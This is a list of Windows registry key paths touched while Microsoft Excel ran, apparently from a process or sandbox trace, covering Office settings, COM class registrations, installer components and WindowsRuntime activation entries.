HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\HitTestOverlaySelectedColor
HKEY_CURRENT_USER\Software\Policies\Policies\Microsoft\Office\16.0\Word\Options
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options\DefaultFormat
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\FileFormatBallotBoxTelemetryEventSent
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\TargetedMessagingService
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TargetedMessagingService
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\UpsellState
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\Sound
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\Resiliency
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\Resiliency\ResiliencySimulator
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\LastKnownC2RProductReleaseId
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\LastKnownC2RProductReleaseId\Excel
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Licensing\LastKnownC2RProductReleaseId
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Excel\File MRU
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\FOLDERID_Desktop
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\File MRU\FOLDERID_Documents
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Excel\Place MRU
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Place MRU
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Place MRU\FOLDERID_Desktop
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Place MRU\FOLDERID_Documents
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Recent Files
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Excel\Recent Files
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\DLP
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\DLP
HKEY_CLASSES_ROOT\TypeLib\{9B92EB61-CBC1-11D3-8C2D-00A0CC37B591}\1.2\0\win32
HKEY_LOCAL_MACHINE\Software\Classes\TypeLib\{9B92EB61-CBC1-11D3-8C2D-00A0CC37B591}\1.2\0\win32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Applications\XLMAIN
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Applications\XLMAIN\FriendlyName
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Applications\XLMAIN\LabelText
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Applications\XLMAIN\Save
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Applications\XLMAIN\ShowButtons
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Applications\XLMAIN\ShowIndicators
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Applications\XLMAIN\NoLabelOption
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Applications\XLMAIN\NoSaveOption
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Applications\XLMAIN\NoButtonOption
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Smart Tag\Applications\XLMAIN\NoIndicatorOption
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Documents\LastPurgeTime
HKEY_CURRENT_USER\Software\Policies\Policies\Microsoft\Office\16.0\Common
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\Common\Audience
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\Audience
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\Common\ClientTelemetry\Volatile
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\Volatile
HKEY_LOCAL_MACHINE\Software\Microsoft\IdentityCRL\ClockData
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\IdentityCRL\ClockData
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{4590f811-1d3a-11d0-891f-00aa004b2e24}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{4590f811-1d3a-11d0-891f-00aa004b2e24}\InsecureQI
HKEY_CURRENT_USER\Software\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\InProcServer
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\InProcHandler
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\AppID
HKEY_CURRENT_USER\Software\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\LocalService
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\ServiceParameters
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\RemoteServerName
HKEY_LOCAL_MACHINE\Software\Classes\AppID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\DllSurrogate
HKEY_CURRENT_USER\Software\Classes\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}\InProcHandler
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}\AppID
HKEY_CURRENT_USER\Software\Classes\CLSID\{E7D35CFA-348B-485E-B524-252725D697CA}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{E7D35CFA-348B-485E-B524-252725D697CA}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{E7D35CFA-348B-485E-B524-252725D697CA}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{E7D35CFA-348B-485E-B524-252725D697CA}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{E7D35CFA-348B-485E-B524-252725D697CA}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{E7D35CFA-348B-485E-B524-252725D697CA}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{E7D35CFA-348B-485E-B524-252725D697CA}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{E7D35CFA-348B-485E-B524-252725D697CA}\InProcHandler
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{E7D35CFA-348B-485E-B524-252725D697CA}\AppID
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\WEF\DisableAppCommandsAutoInstall
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\WEF\TrustedCatalogs\ClearInstalledExtensions
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\WEF\Signal\PreWarm
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\WEF\Signal\PreWarm
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\WEF\Signal\PreWarm\ExcelLastUseTimestamp
HKEY_CURRENT_USER\Software\Classes\CLSID\{77F10CF0-3DB5-4966-B520-B7C54FD35ED6}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{77F10CF0-3DB5-4966-B520-B7C54FD35ED6}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{77F10CF0-3DB5-4966-B520-B7C54FD35ED6}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{77F10CF0-3DB5-4966-B520-B7C54FD35ED6}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{77F10CF0-3DB5-4966-B520-B7C54FD35ED6}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{77F10CF0-3DB5-4966-B520-B7C54FD35ED6}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{77F10CF0-3DB5-4966-B520-B7C54FD35ED6}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{77F10CF0-3DB5-4966-B520-B7C54FD35ED6}\InProcHandler
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{77F10CF0-3DB5-4966-B520-B7C54FD35ED6}\AppID
HKEY_CURRENT_USER\Software\Classes\CLSID\{00000344-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00000344-0000-0000-C000-000000000046}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{77f10cf0-3db5-4966-b520-b7c54fd35ed6}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{77f10cf0-3db5-4966-b520-b7c54fd35ed6}\InsecureQI
HKEY_CURRENT_USER\Software\Classes\CLSID\{660B90C8-73A9-4B58-8CAE-355B7F55341B}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{660B90C8-73A9-4B58-8CAE-355B7F55341B}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{660B90C8-73A9-4B58-8CAE-355B7F55341B}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{660B90C8-73A9-4B58-8CAE-355B7F55341B}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{660B90C8-73A9-4B58-8CAE-355B7F55341B}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{660B90C8-73A9-4B58-8CAE-355B7F55341B}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{660B90C8-73A9-4B58-8CAE-355B7F55341B}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{660B90C8-73A9-4B58-8CAE-355B7F55341B}\InProcHandler
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{660B90C8-73A9-4B58-8CAE-355B7F55341B}\AppID
HKEY_CURRENT_USER\Software\Classes\CLSID\{3237555C-C043-4836-AFDE-570D63E9EDAB}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{3237555C-C043-4836-AFDE-570D63E9EDAB}
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Toolbars\ScreenTipScheme
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\ReportAmbigAccels
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-932793227-1321892499-785312009-1001\Installer\Components\56DED934DF2E433449EE5A527FBB2B94
HKEY_USERS\S-1-5-21-932793227-1321892499-785312009-1001\Software\Microsoft\Installer\Components\56DED934DF2E433449EE5A527FBB2B94
HKEY_LOCAL_MACHINE\Software\Classes\Installer\Components\56DED934DF2E433449EE5A527FBB2B94
HKEY_LOCAL_MACHINE\Software\Classes\Installer\Components\56DED934DF2E433449EE5A527FBB2B94\colorSchemes
HKEY_LOCAL_MACHINE\Software\Classes\Installer\Features\00006109F00000000000000000F01FEC\OArt_DocTheme
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F00000000000000000F01FEC\Features\OArt_DocTheme
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\C09820D90E706754CB0F0B7163D39B8F
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\C09820D90E706754CB0F0B7163D39B8F\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\624352BC0727FDB44915354E407C7881
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\624352BC0727FDB44915354E407C7881\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D478A7EC9F3E226458581EA9D150FF9A
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\D478A7EC9F3E226458581EA9D150FF9A\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0ADB02A9ED18DB341A895A9E410D2B82
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\0ADB02A9ED18DB341A895A9E410D2B82\00006109F00000000000000000F01FEC
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\DisableFontLinking
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\PenPointerMode
HKEY_CURRENT_USER\Software\Classes\CLSID\{000CDB0D-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{000CDB0D-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{000CDB0D-0000-0000-C000-000000000046}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{000CDB0D-0000-0000-C000-000000000046}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{000CDB0D-0000-0000-C000-000000000046}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{000CDB0D-0000-0000-C000-000000000046}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{000CDB0D-0000-0000-C000-000000000046}\InProcServer
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{000CDB0D-0000-0000-C000-000000000046}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{000CDB0D-0000-0000-C000-000000000046}\InProcHandler
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{000CDB0D-0000-0000-C000-000000000046}\AppID
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Internet\WebServiceCache
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\WebServiceCache
HKEY_CURRENT_USER\Software\Classes\CLSID\{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}\InProcHandler
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}\AppID
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}\InsecureQI
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.RKPRY.RKR.15
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\HRZR_PGYFRFFVBA
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000020284
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000020282
HKEY_CLASSES_ROOT\CLSID\{56AD4C5D-B908-4F85-8FF1-7940C29B3BCF}\Instance
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonArray
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonArray\ActivationType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonArray\Server
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonArray\DllPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonArray\Threading
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonArray\TrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonArray\CustomAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonArray\RemoteServer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonArray\ActivateAsUser
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonArray\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonArray\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonArray\Permissions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Data.Json.JsonArray\ActivateOnHostFlags
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:00000000000302AA
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:00000000000402A8
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000040282
HKEY_CURRENT_USER\Software\Classes\Microsoft.Office.EXCEL.EXE.15
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\Pacific Standard Time
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\Pacific Standard Time\Dynamic DST
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\Pacific Standard Time\Dynamic DST\FirstEntry
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\Pacific Standard Time\Dynamic DST\LastEntry
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\ActivityDataModel\ReaderRevisionInfo\112DF3B9-46FD-489C-9225-38E8C540F72A
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\ValidateRegItems
HKEY_CLASSES_ROOT\CLSID\{4234D49B-0245-4DF3-B780-3893943456E1}\Instance
HKEY_CLASSES_ROOT\CLSID\{4234D49B-0245-4DF3-B780-3893943456E1}\InProcServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4234d49b-0245-4df3-b780-3893943456e1}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4234d49b-0245-4df3-b780-3893943456e1}\InProcServer32\LoadWithoutCOM
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\{4234D49B-0245-4DF3-B780-3893943456E1}
HKEY_CLASSES_ROOT\.EXE
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\(Default)
HKEY_CLASSES_ROOT\exefile
HKEY_CURRENT_USER\Software\Classes\exefile\CurVer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\CurVer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000050282
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:00000000000702A8
HKEY_CLASSES_ROOT\Applications\ApplicationFrameHost.exe
HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Repository\Families\windows.immersivecontrolpanel_cw5n1h2txyewy
HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Repository\Families\windows.immersivecontrolpanel_cw5n1h2txyewy\windows.immersivecontrolpanel_10.0.2.1000_neutral_neutral_cw5n1h2txyewy
HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Repository\Families\windows.immersivecontrolpanel_cw5n1h2txyewy\windows.immersivecontrolpanel_10.0.2.1000_neutral_neutral_cw5n1h2txyewy\Flags
HKEY_CURRENT_USER\Software\Classes\CLSID\{11659A23-5884-4D1B-9CF6-67D6F4F90B36}
HKEY_CURRENT_USER\Software\Classes\CLSID\{11659a23-5884-4d1b-9cf6-67d6f4f90b36}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11659a23-5884-4d1b-9cf6-67d6f4f90b36}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11659a23-5884-4d1b-9cf6-67d6f4f90b36}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11659a23-5884-4d1b-9cf6-67d6f4f90b36}\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{c53e07ec-25f3-4093-aa39-fc67ea22e99d}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c53e07ec-25f3-4093-aa39-fc67ea22e99d}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c53e07ec-25f3-4093-aa39-fc67ea22e99d}\ActivateOnHostFlags
HKEY_CURRENT_USER\Software\Classes\CLSID\{11659a23-5884-4d1b-9cf6-67d6f4f90b36}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11659a23-5884-4d1b-9cf6-67d6f4f90b36}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c53e07ec-25f3-4093-aa39-fc67ea22e99d}\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{11659a23-5884-4d1b-9cf6-67d6f4f90b36}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11659a23-5884-4d1b-9cf6-67d6f4f90b36}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c53e07ec-25f3-4093-aa39-fc67ea22e99d}\InProcServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c53e07ec-25f3-4093-aa39-fc67ea22e99d}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c53e07ec-25f3-4093-aa39-fc67ea22e99d}\InProcServer32\ThreadingModel
HKEY_CURRENT_USER\Software\Classes\CLSID\{c53e07ec-25f3-4093-aa39-fc67ea22e99d}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c53e07ec-25f3-4093-aa39-fc67ea22e99d}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\CLSID\{c53e07ec-25f3-4093-aa39-fc67ea22e99d}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c53e07ec-25f3-4093-aa39-fc67ea22e99d}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.PackagePolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.PackagePolicy\ActivationType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.PackagePolicy\Server
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.PackagePolicy\DllPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.PackagePolicy\Threading
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.PackagePolicy\TrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.PackagePolicy\CustomAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.PackagePolicy\RemoteServer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.PackagePolicy\ActivateAsUser
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.PackagePolicy\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.PackagePolicy\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.PackagePolicy\Permissions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Internal.StateRepository.PackagePolicy\ActivateOnHostFlags
HKEY_CURRENT_USER\Software\Classes\Interface\{F7A88EC3-6F33-46BF-83B8-78AAF94AC396}
